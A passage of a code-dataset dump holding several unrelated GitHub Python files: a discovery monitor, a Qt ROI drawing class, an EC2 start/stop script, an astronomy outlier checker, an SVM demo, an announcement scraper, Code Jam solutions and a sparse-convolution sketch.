requests.exceptions.HTTPError as err:\n LOG.error(\"Error requesting discovery on target %s | %s\",\n target, err)\n raise\n else:\n if discovery['id'] not in pfqueue._persisted:\n pfqueue.put({target: {t: discovery['id'] for t in rttags}})\n pfqueue._persisted.add(discovery['id'])\n LOG.info(\"Successfully triggered discovery for target %s. \"\n \"Monitoring for this discovery begins now.\", target)\n return monitor_discovery(discovery['id'], waldo_client)\n\n\ndef monitor_discovery(discovery_id, waldo_client, timeout=60*60, wait=5):\n \"\"\"Monitor discovery with a default timeout of 1 hour.\n\n If timestamp on discovery is observed to be older than 'timeout' seconds,\n raise DiscoveryMonitorTimeoutError.\n\n Since this function is often ran in a separate thread, we will rely on\n the logging module to get messages to stdout, so ensure_streamhandler()\n is always called when the function runs.\n \"\"\"\n discovery = None\n try:\n discovery = waldo_client.get_discovery(\n discovery_id, include_system_info=False)\n except (ValueError, TypeError) as err:\n LOG.error(\"Failed to decode or fetch discovery %s. Will retry. 
| %s\",\n discovery_id, str(err))\n else:\n if discovery and (discovery['status']\n not in ['REQUESTED', 'PENDING']):\n return discovery\n else:\n # check for staleness\n dtime = to_datetime(discovery['time'])\n age = datetime.datetime.utcnow() - dtime\n if age > datetime.timedelta(seconds=timeout):\n raise DiscoveryMonitorTimeoutError(\n \"Giving up on discovery of age %s\" % age)\n # else retry\n time.sleep(wait)\n return monitor_discovery(discovery_id, waldo_client,\n timeout=timeout, wait=wait)\n","repo_name":"shterrel/Waldo","sub_path":"waldo-client/waldoc/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":20589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8547455004","text":"from typing import Collection, Dict\n\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtCore, QtGui\n\nfrom ..structures import OptionsDict, XYVertices\nfrom ..views.rois import SHAPE_ROI_MAPPING, PlotDataROI\n\n__all__ = [\"RoiCollection\"]\n\n\nclass RoiCollection(QtCore.QObject):\n # Signal(ExtendedROI)\n sigShapeFinished = QtCore.Signal(object) # roiVertices : XYVertices\n\n def __init__(\n self,\n allowableShapes: Collection[OptionsDict] = (),\n parent: pg.GraphicsView = None,\n ):\n super().__init__(parent)\n\n if allowableShapes is None:\n allowableShapes = set()\n self.shapeVerts = XYVertices()\n # Make a new graphics item for each roi type\n self.parameterRoiMap: Dict[OptionsDict, PlotDataROI] = {}\n self._shapeParameter = (\n next(iter(allowableShapes)) if len(allowableShapes) > 0 else None\n )\n\n self._locks = set()\n self.addLock(self)\n self._parent = parent\n\n for shape in allowableShapes:\n newRoi = SHAPE_ROI_MAPPING[shape]()\n newRoi.setZValue(1000)\n self.parameterRoiMap[shape] = newRoi\n newRoi.setRoiPoints()\n newRoi.hide()\n self.addRoisToView(parent)\n\n def addRoisToView(self, view: pg.GraphicsView):\n self._parent = view\n if view is not None:\n for roi in self.parameterRoiMap.values():\n roi.hide()\n view.addItem(roi)\n\n def clearAllRois(self):\n for roi in self.parameterRoiMap.values(): # type: PlotDataROI\n roi.setRoiPoints()\n roi.hide()\n self.addLock(self)\n # If all ROIs share the same action stack, calling \"flush\" on one should\n # take care of everything But this is a failsafe against separate undo\n # buffers for each shape\n roi.flushBuildActions()\n\n def addLock(self, lock):\n \"\"\"\n Allows this shape collection to be `locked`, preventing shapes from being drawn.\n Multiple locks can be applied; ROIs can only be drawn when all locks are removed.\n\n Parameters\n ----------\n lock\n Anything used as a lock. This will have to be manually removed later using\n ``RoiCollection.removeLock``\n \"\"\"\n self._locks.add(lock)\n\n def removeLock(self, lock):\n try:\n self._locks.remove(lock)\n except KeyError:\n pass\n\n def forceUnlock(self):\n self._locks.clear()\n\n @property\n def locked(self):\n return len(self._locks) > 0\n\n def buildRoi(self, ev: QtGui.QMouseEvent, imageItem: pg.ImageItem = None):\n \"\"\"\n Construct the current shape ROI depending on mouse movement and current shape\n parameters\n\n Parameters\n ----------\n imageItem\n Image the ROI is drawn upon, used for mapping event coordinates from a\n scene to pixel coordinates. 
If *None*, event coordinates are assumed to\n already be relative to pixel coordinates.\n ev\n Mouse event\n \"\"\"\n # Unblock on mouse press\n # None imageItem is only the case during programmatic calls so allow this case\n if (\n (imageItem is None or imageItem.image is not None)\n and ev.type() == QtCore.QEvent.Type.MouseButtonPress\n and ev.button() == QtCore.Qt.MouseButton.LeftButton\n ):\n self.removeLock(self)\n if self.locked:\n return False\n eventPos = ev.position() if hasattr(ev, \"position\") else ev.localPos()\n if imageItem is not None:\n posRelToImg = imageItem.mapFromScene(eventPos)\n else:\n posRelToImg = eventPos\n # Form of rate-limiting -- only simulate click if the next pixel is at least\n # one away from the previous pixel location\n xyCoord = XYVertices([[posRelToImg.x(), posRelToImg.y()]], dtype=float)\n curRoi = self.currentShape\n constructingRoi, self.shapeVerts = self.currentShape.updateShape(ev, xyCoord)\n if self.shapeVerts is not None:\n self.sigShapeFinished.emit(self.shapeVerts)\n\n if not constructingRoi:\n # Vertices from the completed shape are already stored, so clean up the\n # shapes.\n curRoi.setRoiPoints()\n curRoi.hide()\n else:\n # Still constructing ROI. Show it\n curRoi.show()\n return constructingRoi\n\n @property\n def shapeParameter(self):\n return self._shapeParameter\n\n @shapeParameter.setter\n def shapeParameter(self, newShape: OptionsDict):\n \"\"\"\n When the shape is changed, be sure to reset the underlying ROIs\n \"\"\"\n # Reset the underlying ROIs for a different shape than we currently are using\n if newShape != self._shapeParameter:\n self.clearAllRois()\n self._shapeParameter = newShape\n\n @property\n def currentShape(self):\n return self.parameterRoiMap[self._shapeParameter]\n","repo_name":"ntjess/s3a","sub_path":"s3a/controls/drawctrl.py","file_name":"drawctrl.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72225719234","text":"\n# Script to power on and power off aws-instances. Make sure to run aws configure and set your account before executing this script. Also, boto3 aws package should be# installed\n\nimport sys\nimport boto3\nfrom botocore.exceptions import ClientError\n\nec2 = boto3.client('ec2')\n\nresponse = ec2.describe_instances()\n\n# Required output will be in 'Reservations'\n\noutput = response['Reservations']\n\n# calculate the length of the output rather list\n\ninstance_ids = [] # This is an empty list of instances\n\nfor i in range(len(output)):\n instance_ids.append(output[i]['Instances'][0]['InstanceId'])\n\ndef poweron():\n #This currently powers on ubuntu and vsrx\n for i in instance_ids:\n try:\n response_out = ec2.start_instances(InstanceIds=[i], DryRun=False)\n print(response_out)\n except ClientError as e:\n print(e)\n\ndef poweroff():\n #This powers off ubuntu and srx\n for i in instance_ids:\n try:\n response_out = ec2.stop_instances(InstanceIds=[i], DryRun=False)\n print(response_out)\n except ClientError as e:\n print(e)\n\nif str.lower(sys.argv[1]) == 'on':\n\tpoweron()\nelif str.lower(sys.argv[1]) == 'off':\n poweroff()\nelse:\n\tprint(\"Key words supported on and off! exiting\")\n\tsys.exit(1)\n\n","repo_name":"yukthr/auts","sub_path":"random_programs/aws/start_aws.py","file_name":"start_aws.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"}
+{"seq_id":"8637656088","text":"import warnings\nfrom glob import glob\nfrom pathlib import Path\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import pearsonr\nfrom scipy.optimize import curve_fit\nimport pandas as pd\nfrom tqdm import tqdm\nfrom astropy.time import Time\nfrom astropy.table import Table\nfrom astropy.units import UnitsWarning\n\nfrom source_names_dict import source_names_dict, source_names_w_counterparts, source_names_readable\n\nwarnings.filterwarnings('ignore', category=UnitsWarning, append=True)\n\ndef line(x, m, c):\n return m*x+c\n\ndef df_properties(tab, tab_name):\n prop = {}\n prop['name'] = tab_name\n prop['length'] = len(tab)\n prop['N_obs'] = len(np.unique(tab[\"OBSID\"]))\n prop['N_bad'] = len(tab[tab['BAD'] == True])\n prop['N_good'] = len(tab[tab['BAD'] == False])\n prop['N_UL'] = len(tab[tab['UL'] == True])\n return prop\n \ndef get_exluded_obs(tab_big, tab_small):\n obs1 = np.unique(tab_big['OBSID'])\n obs2 = np.unique(tab_small['OBSID'])\n obs_excluded = np.setdiff1d(obs1,obs2)\n obs_excluded = list(obs_excluded)\n return obs_excluded\n\ndef calc_subsets(tab):\n uvot_rate = 'COI_SRC_RATE'\n uvot_rate_err = 'COI_SRC_RATE_ERR'\n xrt_rate = 'Rate'\n xrt_rate_err = 'Ratepos'\n \n \n tables = {}\n \n # Add idx column for original position\n tab['idx'] = range(len(tab))\n \n \n # Filter out 5 sigma outliers\n xrt_rate_mean = np.mean(tab[xrt_rate])\n uvot_rate_mean = np.mean(tab[uvot_rate])\n\n xrt_rate_std = np.std(tab[xrt_rate])\n uvot_rate_std = np.std(tab[uvot_rate])\n\n tables['tab_5_sig'] = tab[(tab[xrt_rate] < xrt_rate_mean + 5 * xrt_rate_std)\n & (tab[xrt_rate] > xrt_rate_mean - 5 * xrt_rate_std)\n & (tab[uvot_rate] < uvot_rate_mean + 5 * uvot_rate_std)\n & (tab[uvot_rate] > uvot_rate_mean - 5 * uvot_rate_std)]\n\n # Get UL and BAD subsets\n tab_5_sig = tables['tab_5_sig']\n tables['tab_UL'] = tab_5_sig[tab_5_sig['UL'] == True]\n tables['tab_no_UL'] = tab_5_sig[tab_5_sig['UL'] == False]\n\n tables['tab_BAD'] = tab_5_sig[tab_5_sig['BAD'] == True]\n tables['tab_no_BAD'] = tab_5_sig[tab_5_sig['BAD'] == False]\n\n tables['tab_UL_no_bad'] = tab_5_sig[(tab_5_sig['BAD'] == False) & (tab_5_sig['UL'] == True)]\n tables['tab_no_UL_no_bad'] = tab_5_sig[(tab_5_sig['BAD'] == False) & (tab_5_sig['UL'] == False)]\n return tables\n \n\ndef correlate(fits_path, include_bad, include_UL):\n ####################\n # SETUP SIMULATION # \n ####################\n\n res = {} # Dictionary for storing results\n\n # IF YOU CHANGE THIS, CHANGE THEM IN CALC_SUBSETS TOO\n uvot_rate = 'COI_SRC_RATE'\n uvot_rate_err = 'COI_SRC_RATE_ERR'\n xrt_rate = 'Rate'\n xrt_rate_err = 'Ratepos'\n\n N_mc = 10000\n \n print('correlate()')\n print('----------')\n print('Input:')\n print(f'fits_path = {fits_path}')\n print(f'include_bad = {include_bad}')\n print(f'include_UL = {include_UL}')\n print(f'N_mc = {N_mc}')\n print('')\n\n if 'curve_nosys' in fits_path:\n xrt_curve = 'FULL'\n xrt_rate_err = 'Ratepos'\n elif 'hardrat' in fits_path:\n xrt_curve = fits_path.split('/')[-1].split(',')[-1][:-5]\n xrt_rate_err = 'Error'\n\n print('Using XRT curve:')\n print(f'xrt_curve = {xrt_curve}')\n print('')\n\n print('Using Rates:')\n print(f'uvot_rate = {uvot_rate}')\n print(f'uvot_rate_err = {uvot_rate_err}')\n print(f'xrt_rate = {xrt_rate}')\n print(f'xrt_rate_err = {xrt_rate_err}')\n print('')\n\n uvot_filter = fits_path.split('/')[-1].split(',')[1]\n simbad_name = fits_path.split('/')[-1].split(',')[0]\n readable_name = source_names_readable[simbad_name]\n local_name = 
source_names_dict[simbad_name]\n\n print(f'uvot_filter = {uvot_filter}')\n print(f'simbad_name = {simbad_name}')\n print(f'readable_name = {readable_name}')\n print(f'local_name = {local_name}')\n\n # Setup Paths\n plot_path = Path(f'/mnt/d/anticorr_data/lightcurves/correlation_output/{simbad_name}/plots')\n table_path = Path(f'/mnt/d/anticorr_data/lightcurves/correlation_output/{simbad_name}/tables')\n #plot_path.mkdir(parents=True, exist_ok=True)\n #table_path.mkdir(parents=True, exist_ok=True)\n \n outfile = f'{simbad_name},{xrt_curve},{uvot_filter},{include_bad},{include_UL}'\n #out_table_prop = table_path/f'{outfile},table_prop.csv'\n #out_table_mc = table_path/f'{outfile},table_corr_mc.csv'\n #out_plot_corr_png = plot_path/f'{outfile},corr.png'\n #out_plot_corr_pdf = plot_path/f'{outfile},corr.pdf'\n \n \n ###############\n # Get subsets # \n ###############\n\n tab = Table.read(fits_path)\n print(tab)\n print(tab['OBSID','COI_SRC_RATE','COI_SRC_RATE_ERR', 'Rate','Ratepos','Rateneg'])\n \n tables = calc_subsets(tab)\n tab_5_sig = tables['tab_5_sig']\n tab_UL = tables['tab_UL']\n tab_no_UL = tables['tab_no_UL']\n tab_BAD = tables['tab_BAD']\n tab_no_BAD = tables['tab_no_BAD']\n tab_UL_no_bad = tables['tab_UL_no_bad']\n tab_no_UL_no_bad = tables['tab_no_UL_no_bad']\n \n print('Linear Correlation Test...')\n print('==========================')\n print('--------------------------')\n\n print('Input Parameters:')\n print('-----------------')\n print(f'include_bad : {include_bad}')\n print(f'include_UL : {include_UL}')\n print(f'fits_path : {fits_path}')\n\n print('---------')\n print('Settings:')\n print('---------')\n print(f'N_mc = {N_mc}')\n print(f'uvot_rate = {uvot_rate}')\n print(f'uvot_rate_err = {uvot_rate_err}')\n print(f'xrt_rate = {xrt_rate}')\n print(f'xrt_rate_err = {xrt_rate_err}')\n print(f'uvot_filter = {uvot_filter}')\n print(f'xrt_curve = {xrt_curve}')\n print(f'simbad_name = {simbad_name}')\n print(f'readable_name = {readable_name}')\n print(f'local_name = {local_name}')\n\n print('----------------')\n print('Data Properties:')\n print('----------------')\n all_table_properties = [df_properties(tab, \"tab\"),\n df_properties(tab_5_sig, \"tab_5_sig\"),\n df_properties(tab_UL, \"tab_UL\"),\n df_properties(tab_no_UL, \"tab_no_UL\"),\n df_properties(tab_BAD, \"tab_BAD\"),\n df_properties(tab_no_BAD, \"tab_no_BAD\"),\n df_properties(tab_UL_no_bad, \"tab_UL_no_bad\"),\n df_properties(tab_no_UL_no_bad, \"tab_no_UL_no_bad\")]\n df_tab_prop = pd.DataFrame(all_table_properties)\n #print(df_tab_prop)\n #print(f'Saving to: {out_table_prop}')\n #df_tab_prop.to_csv(out_table_prop, index=False)\n \n\n\n print('----------------------')\n print('Excluded Observations:')\n print('----------------------')\n excluded_obs = {}\n excluded_obs['tab_5_sig'] = get_exluded_obs(tab, tab_5_sig)\n #excluded_obs['tab_UL'] = get_exluded_obs(tab, tab_UL)\n #excluded_obs['tab_no_UL'] = get_exluded_obs(tab, tab_no_UL)\n #excluded_obs['tab_BAD'] = get_exluded_obs(tab, tab_BAD)\n #excluded_obs['tab_no_BAD'] = get_exluded_obs(tab, tab_no_BAD)\n #excluded_obs['tab_UL_no_bad'] = get_exluded_obs(tab, tab_UL_no_bad)\n #excluded_obs['tab_no_UL_no_bad'] = get_exluded_obs(tab, tab_no_UL_no_bad)\n\n lines_ds9 = []\n for k, v in excluded_obs.items():\n print(f'{k} : ')\n print(v)\n if len(v) > 0:\n for obsid in v:\n\n img_files = glob(f'download_scripts/{local_name}/{obsid}/*_sk.img.gz')\n reg_files = glob(f'download_scripts/{local_name}/*.reg')\n \n \n if len(img_files)==0:\n continue \n \n file_img = img_files[0] 
\n file_src_region = reg_files[0]\n file_bkg_region = reg_files[1]\n \n print('Found 5sig')\n crap = tab[tab['OBSID'] == v]['OBSID','COI_SRC_RATE','COI_SRC_RATE_ERR', 'Rate','Ratepos','Rateneg']\n print(crap)\n\n\n\n xrtr = crap[xrt_rate][0]\n uvotr = crap[uvot_rate][0]\n\n xrt_rate_mean = np.mean(tab[xrt_rate])\n uvot_rate_mean = np.mean(tab[uvot_rate])\n\n xrt_rate_std = np.std(tab[xrt_rate])\n uvot_rate_std = np.std(tab[uvot_rate])\n\n xrt_g_5sig = xrt_rate_mean+5*xrt_rate_std\n xrt_l_5sig = xrt_rate_mean-5*xrt_rate_std\n\n uvot_g_5sig = uvot_rate_mean+5*uvot_rate_std\n uvot_l_5sig = uvot_rate_mean-5*uvot_rate_std\n\n xrt_dev = (xrtr - xrt_rate_mean) / xrt_rate_std\n uvot_dev = (uvotr - uvot_rate_mean) / uvot_rate_std\n\n xrt_label = ''\n uvot_label = ''\n if xrtr > xrt_g_5sig:\n xrt_label ='[xrt hi]'\n if xrtr < xrt_l_5sig:\n xrt_label = '[xrt_lo]'\n if uvotr > uvot_g_5sig:\n uvot_label ='[uvot hi]'\n if uvotr < uvot_l_5sig:\n uvot_label = '[uvot lo]'\n\n\n\n \n lines =[f\"echo Source Name = {readable_name}\\n\",\n f\"echo UVOT filter = {uvot_filter}\\n\",\n f\"echo obsid = {obsid}\\n\",\n f\"echo uvot_rate={uvotr:.4f} [{uvot_dev:.4f} sig] mu={uvot_rate_mean:.4f} std={uvot_rate_std:.4f} +5std={uvot_g_5sig:.4f} -5std={uvot_l_5sig:.4f} {uvot_label}\\n\",\n f\"echo xrt_rate ={xrtr:.4f} [{xrt_dev:.4f} sig] mu={xrt_rate_mean:.4f} std={xrt_rate_std:.4f} +5std={xrt_g_5sig:.4f} -5std={xrt_l_5sig:.4f} {xrt_label}\\n\"]\n\n line_ds9 = f\"ds9 -tile {file_img} -region {file_src_region} -region {file_bkg_region} -scale log -zoom to fit -cmap b\\n\"\n print(line_ds9)\n\n with open('ds9_5sig.sh', 'a') as f:\n f.writelines(lines)\n f.write(line_ds9)\n\n print('='*50)\n return res\n\n\n\nif __name__ == \"__main__\":\n curve_nosys_files = glob(f'lightcurves/joined/*curve_nosys*.fits')\n hardrat_files = glob(f'lightcurves/joined/*hardrat*.fits')\n \n print(f'N_hardrat_files={len(hardrat_files)} N_curve_nosys_files={len(curve_nosys_files)}')\n print('Press any key to start, Ctrl+C to quit')\n for fits_path in curve_nosys_files:\n try:\n correlate(fits_path, include_bad=True, include_UL=True)\n except Exception as e:\n line = f\"#{fits_path} : Error: {e}\\n\"\n with open('ds9_5sig.sh', 'a') as f:\n f.write(f'{line}')\n\n\n print('#'*50)\n print('#'*50)\n\n for fits_path in hardrat_files:\n correlate(fits_path, include_bad=True, include_UL=False)\n correlate(fits_path, include_bad=False, include_UL=False)\n print('#'*50)\n print('#'*50)\n\n","repo_name":"nx1/anticorr_data","sub_path":"check_5sig.py","file_name":"check_5sig.py","file_ext":"py","file_size_in_byte":11027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72335527554","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 3 14:55:15 2018\r\n\r\n@author: acakmak\r\n\"\"\"\r\n#First, import the libraries\r\nimport numpy as np\r\nimport matplotlib as plt\r\nfrom pylab import *\r\nfrom sklearn import svm, datasets\r\n\r\n\r\n#Generate some fake clusters for N peoples' income/age \r\ndef createClusteredData(N, k):\r\n pointsPerCluster = float(N)/k\r\n X = []\r\n y = []\r\n for i in range (k):\r\n incomeCentroid = np.random.uniform(20000.0, 200000.0)\r\n ageCentroid = np.random.uniform(20.0, 70.0)\r\n for j in range(int(pointsPerCluster)):\r\n X.append([np.random.normal(incomeCentroid, 10000.0), np.random.normal(ageCentroid, 2.0)])\r\n y.append(i)\r\n X = np.array(X)\r\n y = np.array(y)\r\n return X, y\r\n\r\n\r\n\r\n# K-Means clustering culsters the data\r\n(X, y) = createClusteredData(100, 5)\r\n\r\nplt.figure(figsize=(8, 6))\r\nplt.scatter(X[:,0], X[:,1], c=y.astype(np.float))\r\nplt.show()\r\n\r\n\r\n\r\n\r\n# we use linear SVC to divide our chart into clusters:\r\nC = 1.0\r\nsvc = svm.SVC(kernel='linear', C=C).fit(X, y)\r\n\r\n\r\n# we can color the regions of each cluster:\r\ndef plotPredictions(clf):\r\n xx, yy = np.meshgrid(np.arange(0, 250000, 10),\r\n np.arange(10, 70, 0.5))\r\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\r\n\r\n plt.figure(figsize=(8, 6))\r\n Z = Z.reshape(xx.shape)\r\n plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)\r\n plt.scatter(X[:,0], X[:,1], c=y.astype(np.float))\r\n plt.show()\r\n \r\nplotPredictions(svc)\r\n\r\n\r\n#Then, we may print the predictions:\r\nprint(svc.predict([[200000, 70]]))\r\n\r\nprint(svc.predict([[50000, 95]]))","repo_name":"cakmakaf/SVMs_for_an_Income_vs_Age_Problem","sub_path":"Linear_SVM_imaginary_income.py","file_name":"Linear_SVM_imaginary_income.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"35495780856","text":"# import urllib.request\r\nfrom urllib.parse import urlparse\r\nimport re\r\nimport json\r\nimport time\r\nimport requests\r\nfrom lxml.html import etree\r\nfrom urllib.error import URLError, HTTPError, ContentTooShortError\r\n\r\n\r\nclass Throttle:\r\n \"\"\"Add a delay between donwloads to the same domain\"\"\"\r\n def ___init___(self, delay):\r\n self.delay = delay\r\n self.domains = {}\r\n\r\n def wait(self, url):\r\n domain = urlparse(url).netloc\r\n last_accessed = self.domains.get(domain)\r\n\r\n if self.delay > 0 and last_accessed is not None:\r\n sleep_secs = self.delay - (time.time() - last_accessed)\r\n if sleep_secs > 0:\r\n time.sleep(sleep_secs)\r\n self.domains[domain] = time.time()\r\n\r\n\r\ndef download(url, user_agent=None, num_retries=2, charset='utf-8', use_proxy=False):\r\n print(\"Downloading: \", url)\r\n\r\n if user_agent is None:\r\n user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\"\r\n \r\n if use_proxy:\r\n proxies = {\r\n \"http\": \"127.0.0.1:10809\",\r\n \"https\": \"127.0.0.1:10809\"\r\n }\r\n\r\n headers = {'user-agent': user_agent}\r\n try:\r\n if use_proxy:\r\n r = requests.get(url, headers=headers, proxies=proxies)\r\n else:\r\n r = requests.get(url, headers=headers)\r\n html = r.text\r\n except (requests.ConnectionError, requests.HTTPError, requests.Timeout, requests.TooManyRedirects) as e:\r\n print(\"Some exception occured: \", e.reason)\r\n html = None\r\n if num_retries > 0:\r\n if 500 <= r.status_code < 600:\r\n return download(url, num_retries-1)\r\n return html\r\n\r\n\r\ndef get_links(html):\r\n \"\"\"Return a list of links from html\"\"\"\r\n webpage_regex = re.compile(\"\"\"]+href=[\"'](.*?)[\"']\"\"\", re.IGNORECASE)\r\n return webpage_regex.findall(html)\r\n\r\n\r\ndef get_announcements_from_url(url):\r\n html = download(url)\r\n titles = []\r\n if html is not None:\r\n json_obj = json.loads(html)\r\n for ann in json_obj[\"announcements\"]:\r\n title = ann[\"announcementTitle\"]\r\n title = re.sub(r'?em>', \"\", title)\r\n titles.append(title)\r\n else:\r\n print(f\"Some exceptions happend in get_announcements_from_url, return empty list (URL: {url})\")\r\n return titles\r\n\r\n\r\ndef get_all_announcements():\r\n url_tmpl = \"http://www.cninfo.com.cn/new/fulltextSearch/full?searchkey=比亚迪&sdate=&edate=&isfulltext=false&sortName=pubdate&sortType=desc&pageNum=%d\"\r\n html = download(url_tmpl % 1)\r\n titles = []\r\n if html is not None:\r\n json_obj = json.loads(html)\r\n titles = titles + get_announcements_from_url(url_tmpl % 1)\r\n total_pages = json_obj[\"totalpages\"]\r\n if total_pages > 1:\r\n for i in range(2, total_pages+2):\r\n time.sleep(1)\r\n titles = titles + get_announcements_from_url(url_tmpl % i)\r\n\r\n return titles\r\n \r\n\r\nif __name__ == \"__main__\":\r\n titles = get_all_announcements()\r\n for title in titles:\r\n print(title)\r\n \r\n","repo_name":"davidlyu/investorMate","sub_path":"cninf.py","file_name":"cninf.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23447542671","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nProblem D. \r\nuses python 3.3\r\n\r\n@author: Eric Kuritzky\r\n\"\"\"\r\nfrom collections import *\r\nimport itertools as ito\r\nimport operator as op\r\nimport functools as ft\r\nfrom sys import argv, stdin, stdout, stderr, setrecursionlimit\r\n\r\n#setrecursionlimit(1000000)\r\n\r\nerrprt = ft.partial(print, file=stderr) \r\n \r\ndef readcase(f):\r\n nstr, nshard = readints(f)\r\n strs = [f.readline().strip() for _ in range(nstr)]\r\n return nshard, strs\r\n\r\ndef solvecase(case):\r\n nshard, strs = case\r\n worst = nties = 0\r\n for assign in ito.product(range(nshard), repeat=len(strs)):\r\n cost = getcost(strs, assign, nshard)\r\n if cost > worst:\r\n worst, nties = cost, 0\r\n elif cost == worst:\r\n nties += 1\r\n return '%d %d' % (worst, nties+1)\r\n\r\ndef getcost(strs, assign, nshard):\r\n astr = [[] for _ in range(nshard)]\r\n for i, s in enumerate(strs):\r\n astr[assign[i]].append(s)\r\n cost = 0\r\n for a in astr:\r\n cost += len(set(s[:i] for s in a for i in range(len(s)+1)))\r\n return cost\r\n \r\ndef readints(f):\r\n return list(map(int, f.readline().strip().split(' ')))\r\n\r\ndef readflds(f, types):\r\n if isinstance(types, tuple):\r\n return [typ(fld) for fld, typ\r\n in zip(f.readline().strip().split(),\r\n ito.chain(types, ito.repeat(types[-1])))]\r\n else:\r\n return [types(fld) for fld in f.readline().strip().split()]\r\n\r\ndef main():\r\n with open('D-small-attempt0.in') as f, open('out', 'w') as out:\r\n cases = int(f.readline())\r\n for ncase in range(1, cases+1):\r\n case = readcase(f)\r\n soln = solvecase(case)\r\n print('Case #%d: %s' % (ncase, soln))\r\n print('Case #%d: %s' % (ncase, soln), file=out)\r\n\r\nfrom datetime import datetime\r\n\r\nstart = datetime.now()\r\nprint(str(start))\r\nmain()\r\nstop = datetime.now()\r\nprint(str(stop-start))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_151/56.py","file_name":"56.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2723376355","text":"import os\nimport numpy as np\n\ndef get_output_sites(c, ks, stride, H_in, W_in, subm=False):\n out = []\n for i in range(c[0] - ks + 1, c[0] + 1):\n for j in range(c[1] - ks + 1, c[1] + 1):\n if i < 0 or i > H_in - ks or j < 0 or j > W_in - ks:\n continue\n out_i = i // stride\n out_j = j // stride\n out.append((out_i, out_j))\n return out\n\ndef get_offset(c, p, ks, stride):\n out_i, out_j = p\n src_i = out_i * stride\n src_j = out_j * stride\n offset_x = c[0] - (src_i + ks // 2)\n offset_y = c[1] - (src_j + ks // 2)\n return (offset_x, offset_y)\n\ndef spconv(input, in_coords, spatial_shape, kernel, stride=1, padding=0):\n \"\"\"\n Args:\n input: (N_in, C_in)\n in_coords: (N_in, 2)\n kernel: (k_h, k_w, C_in, C_out)\n Return:\n output: (N_out, C_out)\n \"\"\"\n N_in, C_in = input.shape\n H_in, W_in = spatial_shape\n k_h, k_w, C_in, C_out = kernel.shape\n ks = k_h\n\n hash_in = {}\n v_in = 0\n P_in = []\n for i in range(N_in):\n c = in_coords[i]\n hash_in[(c[0], c[1])] = v_in\n v_in += 1\n P_in.append((c[0], c[1]))\n \n hash_out = {}\n P_out = [[] for _ in range(N_in)]\n v_out = 0\n for i in range(N_in):\n c = in_coords[i]\n output_site = get_output_sites(c, ks, stride, H_in, W_in)\n for site in output_site:\n if site not in hash_out:\n hash_out[site] = v_out\n v_out += 1\n P_out[i] = output_site\n total_v_out = v_out\n \n # build rule book\n rulebook = []\n offset_counter = {}\n for i in range(N_in):\n c = in_coords[i]\n for p in P_out[i]:\n offset = get_offset(c, p, ks, stride)\n v_out = hash_out[p]\n if offset not in offset_counter:\n offset_counter[offset] = 0\n cnt = offset_counter[offset]\n rulebook.append([offset, cnt, i, v_out])\n offset_counter[offset] += 1\n\n output = np.zeros((total_v_out, C_out))\n for i in range(len(rulebook)):\n offset, count, v_in, v_out = rulebook[i]\n kc = (offset[0] + 1, offset[1] + 1)\n kw = kernel[kc[0], kc[1], :, :] # (C_in, C_out)\n in_feat = input[v_in] # (C_in)\n out_feat = np.dot(in_feat, kw) # (C_out)\n # print(v_in, v_out, in_feat, kw)\n output[v_out, :] += out_feat\n \n return output\n\nif __name__ == \"__main__\":\n input = np.random.rand(2, 3)\n spatial_shape = [5, 5]\n in_coords = np.array([[2, 1], [3, 2]])\n kernel = np.random.rand(3, 3, 3, 2)\n \n output = spconv(input, in_coords, spatial_shape, kernel)\n \n print(output)\n print(output.shape)\n\n\n","repo_name":"sunzhy3/exercise","sub_path":"code/spconv.py","file_name":"spconv.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23587904181","text":"from itertools import combinations\r\nfrom math import pi\r\nfrom heapq import *\r\n\r\ndef prikazi(indeks, niz):\r\n return \"Case #{}: {}\".format(indeks, niz)\r\n\r\n\r\ndef pomo(sez):\r\n if sez[-1][1] - sez[0][0] <= 12 * 60:\r\n return 2\r\n elif sez[0][1] + (24 * 60 - sez[-1][0]) <= 12 * 60:\r\n return 2\r\n else:\r\n return 4\r\n\r\n\r\ndef resitevStaro(opra, ac, aj):\r\n if ac + aj == 1:\r\n return 2\r\n if not ac + aj == 2:\r\n return \"NE VEM\"\r\n if ac == 0:\r\n return pomo(opra[1])\r\n elif aj == 0:\r\n return pomo(opra[0])\r\n else:\r\n return 2\r\n\r\ndef dobiOpis(elt):\r\n interval, kdo = elt\r\n od, do = interval\r\n return kdo, od, do\r\n\r\n\r\ndef najdiNasl(slo, i, maxsi):\r\n for j in range(i + 1, maxsi):\r\n if j in slo:\r\n return j\r\n return 0\r\n\r\n\r\ndef resitev(opra):\r\n kajPopravil = True\r\n N = len(opra)\r\n kolko = [0, 0]\r\n slo = {}\r\n idOpra = 0\r\n for par in opra:\r\n kdo, od, do = dobiOpis(par)\r\n kolko[kdo] += do - od\r\n slo[idOpra] = ((od, do), kdo)\r\n idOpra += 1\r\n\r\n pavze = [[], []]\r\n for i in slo:\r\n 